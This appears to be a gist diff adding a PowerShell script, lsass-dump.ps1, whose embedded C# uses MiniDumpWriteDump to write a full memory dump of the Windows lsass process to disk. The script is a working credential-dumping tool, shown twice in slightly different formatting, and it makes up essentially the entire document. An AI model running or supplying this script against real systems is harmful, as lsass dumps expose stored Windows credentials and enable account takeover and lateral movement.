FrankSpierings · June 21, 2022 09:45
diff --git a/lsass-dump.ps1 b/lsass-dump.ps1
 $code = @"
 using System;
 using System.ComponentModel;
 using System.Diagnostics;
 using System.Runtime.InteropServices;
 using System.IO;

 public class MiniDump
 {
    // PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION | PROCESS_VM_READ
    static uint reqAccess = 0x00000450;
    static uint MiniDumpWithFullMemory = 0x00000002;

    [DllImport("dbghelp.dll", SetLastError=true)]
    public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, SafeHandle hFile, uint dumpType, IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam);

    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);

    public static void Main(string[] args)
    {
        if (args.Length < 1) {
            Console.WriteLine("PID required!");
            return;
        }
        uint pid = Convert.ToUInt32(args[0]);

        string path = "";
        if (args.Length < 2) {
            path = Path.GetTempFileName();
        }
        else {
            path = args[1];
        }
        Console.WriteLine(String.Format("Using: {0}", path));
        
        IntPtr hProcess = OpenProcess(reqAccess, false, pid);

        FileStream fs = File.OpenWrite(path);
        bool result = MiniDumpWriteDump(hProcess, pid, fs.SafeFileHandle, MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
        if (!result) {
            Console.WriteLine(new Win32Exception(Marshal.GetLastWin32Error()).Message);
        }
        else {
            Console.WriteLine("Success");
        }
        fs.Close();
    }
 }
 "@;

 Add-Type -Language CSharp $code
 # [MiniDump]::Main(((Get-Process -Name lsass)[0].Id, "C:\temp\lsass.exe.dmp"))
 [MiniDump]::Main(((Get-Process -Name lsass)[0].Id))
	$code = @"
	using System;
	using System.ComponentModel;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.IO;

	public class MiniDump
	{
	// PROCESS_DUP_HANDLE \| PROCESS_QUERY_INFORMATION \| PROCESS_VM_READ
	static uint reqAccess = 0x00000450;
	static uint MiniDumpWithFullMemory = 0x00000002;

	[DllImport("dbghelp.dll", SetLastError=true)]
	public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, SafeHandle hFile, uint dumpType, IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam);

	[DllImport("kernel32.dll", SetLastError=true)]
	public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);

	public static void Main(string[] args)
	{
	if (args.Length < 1) {
	Console.WriteLine("PID required!");
	return;
	}
	uint pid = Convert.ToUInt32(args[0]);

	string path = "";
	if (args.Length < 2) {
	path = Path.GetTempFileName();
	}
	else {
	path = args[1];
	}
	Console.WriteLine(String.Format("Using: {0}", path));

	IntPtr hProcess = OpenProcess(reqAccess, false, pid);

	FileStream fs = File.OpenWrite(path);
	bool result = MiniDumpWriteDump(hProcess, pid, fs.SafeFileHandle, MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
	if (!result) {
	Console.WriteLine(new Win32Exception(Marshal.GetLastWin32Error()).Message);
	}
	else {
	Console.WriteLine("Success");
	}
	fs.Close();
	}
	}
	"@;

	Add-Type -Language CSharp $code
	# [MiniDump]::Main(((Get-Process -Name lsass)[0].Id, "C:\temp\lsass.exe.dmp"))
	[MiniDump]::Main(((Get-Process -Name lsass)[0].Id))